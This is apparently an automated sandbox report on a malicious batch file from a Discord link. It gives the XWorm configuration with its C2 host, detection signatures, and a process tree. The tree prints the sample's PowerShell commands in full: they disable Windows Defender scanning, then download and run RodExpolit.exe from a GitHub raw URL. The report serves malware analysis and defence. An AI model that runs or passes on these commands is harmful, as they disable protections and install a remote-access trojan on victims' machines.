Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1800s -
max time network
1685s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
01/03/2025, 19:55
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1345482930600018010/1345484285460742255/exploit_2.bat?ex=67c4b763&is=67c365e3&hm=06eab45726494c005f7f778a126193c180656c8923b4b0b78d31113e74d0e4af&
Resource
win10ltsc2021-20250217-en
General
Malware Config
Extracted
xworm
127.0.0.1:32672
except-blessed.gl.at.ply.gg:32672
-
Install_directory
%Temp%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000b000000027ea2-155.dat family_xworm behavioral1/memory/1952-157-0x0000000000A70000-0x0000000000A86000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 10 IoCs
flow pid Process 48 1752 powershell.exe 50 1752 powershell.exe 66 3556 powershell.exe 67 3556 powershell.exe 73 4532 powershell.exe 74 4532 powershell.exe 76 1820 powershell.exe 77 1820 powershell.exe 80 3628 powershell.exe 81 3628 powershell.exe -
pid Process 848 powershell.exe 1752 powershell.exe 3764 powershell.exe 2748 powershell.exe 3792 powershell.exe 4388 powershell.exe 2864 powershell.exe 4516 powershell.exe 2432 powershell.exe 3628 powershell.exe 2160 powershell.exe 4244 powershell.exe 1488 powershell.exe 1636 powershell.exe 2140 powershell.exe 1752 powershell.exe 3556 powershell.exe 4532 powershell.exe 1820 powershell.exe 3628 powershell.exe -
Downloads MZ/PE file 5 IoCs
flow pid Process 81 3628 powershell.exe 50 1752 powershell.exe 67 3556 powershell.exe 74 4532 powershell.exe 77 1820 powershell.exe -
Executes dropped EXE 5 IoCs
pid Process 1952 RodExpolit.exe 3860 RodExpolit.exe 4528 RodExpolit.exe 3768 RodExpolit.exe 4532 RodExpolit.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 49 raw.githubusercontent.com 50 raw.githubusercontent.com 67 raw.githubusercontent.com 74 raw.githubusercontent.com 77 raw.githubusercontent.com 81 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 53 ip-api.com 84 ip-api.com -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 742044.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 628 msedge.exe 628 msedge.exe 456 msedge.exe 456 msedge.exe 920 identity_helper.exe 920 identity_helper.exe 4212 msedge.exe 4212 msedge.exe 2864 powershell.exe 2864 powershell.exe 2864 powershell.exe 4244 powershell.exe 4244 powershell.exe 4244 powershell.exe 1488 powershell.exe 1488 powershell.exe 1488 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 4516 powershell.exe 4516 powershell.exe 4516 powershell.exe 2140 powershell.exe 2140 powershell.exe 2140 powershell.exe 848 powershell.exe 848 powershell.exe 848 powershell.exe 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe 2748 powershell.exe 2748 powershell.exe 2748 powershell.exe 2432 powershell.exe 2432 powershell.exe 2432 powershell.exe 3792 powershell.exe 3792 powershell.exe 3792 powershell.exe 4532 powershell.exe 4532 powershell.exe 4532 powershell.exe 4388 powershell.exe 4388 powershell.exe 4388 powershell.exe 3628 powershell.exe 3628 powershell.exe 3628 powershell.exe 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe 1820 powershell.exe 1820 powershell.exe 1820 powershell.exe 1636 powershell.exe 1636 powershell.exe 1636 powershell.exe 2160 powershell.exe 2160 powershell.exe 2160 powershell.exe 3764 powershell.exe 3764 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2864 powershell.exe Token: SeIncreaseQuotaPrivilege 2864 powershell.exe Token: SeSecurityPrivilege 2864 powershell.exe Token: SeTakeOwnershipPrivilege 2864 powershell.exe Token: SeLoadDriverPrivilege 2864 powershell.exe Token: SeSystemProfilePrivilege 2864 powershell.exe Token: SeSystemtimePrivilege 2864 powershell.exe Token: SeProfSingleProcessPrivilege 2864 powershell.exe Token: SeIncBasePriorityPrivilege 2864 powershell.exe Token: SeCreatePagefilePrivilege 2864 powershell.exe Token: SeBackupPrivilege 2864 powershell.exe Token: SeRestorePrivilege 2864 powershell.exe Token: SeShutdownPrivilege 2864 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeSystemEnvironmentPrivilege 2864 powershell.exe Token: SeRemoteShutdownPrivilege 2864 powershell.exe Token: SeUndockPrivilege 2864 powershell.exe Token: SeManageVolumePrivilege 2864 powershell.exe Token: 33 2864 powershell.exe Token: 34 2864 powershell.exe Token: 35 2864 powershell.exe Token: 36 2864 powershell.exe Token: SeDebugPrivilege 4244 powershell.exe Token: SeIncreaseQuotaPrivilege 4244 powershell.exe Token: SeSecurityPrivilege 4244 powershell.exe Token: SeTakeOwnershipPrivilege 4244 powershell.exe Token: SeLoadDriverPrivilege 4244 powershell.exe Token: SeSystemProfilePrivilege 4244 powershell.exe Token: SeSystemtimePrivilege 4244 powershell.exe Token: SeProfSingleProcessPrivilege 4244 powershell.exe Token: SeIncBasePriorityPrivilege 4244 powershell.exe Token: SeCreatePagefilePrivilege 4244 powershell.exe Token: SeBackupPrivilege 4244 powershell.exe Token: SeRestorePrivilege 4244 powershell.exe Token: SeShutdownPrivilege 4244 powershell.exe Token: SeDebugPrivilege 4244 powershell.exe Token: SeSystemEnvironmentPrivilege 4244 powershell.exe Token: SeRemoteShutdownPrivilege 4244 powershell.exe Token: SeUndockPrivilege 4244 powershell.exe Token: SeManageVolumePrivilege 4244 powershell.exe Token: 33 4244 powershell.exe Token: 34 4244 powershell.exe Token: 35 4244 powershell.exe Token: 36 4244 powershell.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeIncreaseQuotaPrivilege 1488 powershell.exe Token: SeSecurityPrivilege 1488 powershell.exe Token: SeTakeOwnershipPrivilege 1488 powershell.exe Token: SeLoadDriverPrivilege 1488 powershell.exe Token: SeSystemProfilePrivilege 1488 powershell.exe Token: SeSystemtimePrivilege 1488 powershell.exe Token: SeProfSingleProcessPrivilege 1488 powershell.exe Token: SeIncBasePriorityPrivilege 1488 powershell.exe Token: SeCreatePagefilePrivilege 1488 powershell.exe Token: SeBackupPrivilege 1488 powershell.exe Token: SeRestorePrivilege 1488 powershell.exe Token: SeShutdownPrivilege 1488 powershell.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeSystemEnvironmentPrivilege 1488 powershell.exe Token: SeRemoteShutdownPrivilege 1488 powershell.exe Token: SeUndockPrivilege 1488 powershell.exe Token: SeManageVolumePrivilege 1488 powershell.exe Token: 33 1488 powershell.exe Token: 34 1488 powershell.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe 456 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 456 wrote to memory of 3772 456 msedge.exe 84 PID 456 wrote to memory of 3772 456 msedge.exe 84 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 4708 456 msedge.exe 85 PID 456 wrote to memory of 628 456 msedge.exe 86 PID 456 wrote to memory of 628 456 msedge.exe 86 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 PID 456 wrote to memory of 1028 456 msedge.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1345482930600018010/1345484285460742255/exploit_2.bat?ex=67c4b763&is=67c365e3&hm=06eab45726494c005f7f778a126193c180656c8923b4b0b78d31113e74d0e4af&1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe437c46f8,0x7ffe437c4708,0x7ffe437c47182⤵PID:3772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:22⤵PID:4708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:82⤵PID:1028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:12⤵PID:2572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:12⤵PID:1104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:82⤵PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5744 /prefetch:82⤵PID:4392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:12⤵PID:4312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:12⤵PID:816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:12⤵PID:3460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:12⤵PID:4036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:12⤵PID:64
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "2⤵PID:400
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"3⤵
- Executes dropped EXE
PID:1952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "2⤵PID:2864
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
PID:3556
-
-
C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"3⤵
- Executes dropped EXE
PID:3860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "2⤵PID:4752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
PID:4532
-
-
C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"3⤵
- Executes dropped EXE
PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "2⤵PID:2136
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"3⤵
- Executes dropped EXE
PID:3768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "2⤵PID:4904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
PID:3628
-
-
C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"3⤵
- Executes dropped EXE
PID:4532
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4520 /prefetch:22⤵PID:4528
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2136
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1944
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
152B
MD57fb0955b2f0e94f2388484f98deb88f4
SHA1ab2363d95af3445a00981e78e6b6f0b860aade14
SHA256a7c4cb739d577bfc41583a2dbf6e94ae41741c4529fe2d0443cd1dabefef8d15
SHA512c9b6b6de78fb78c11b88860cd6c922d11717f5cf7477f602f197531aea114270c2b7111f66d96f60c3a9317fbf203fd26222e81d2d0eb70ad6515f5af1277edf
-
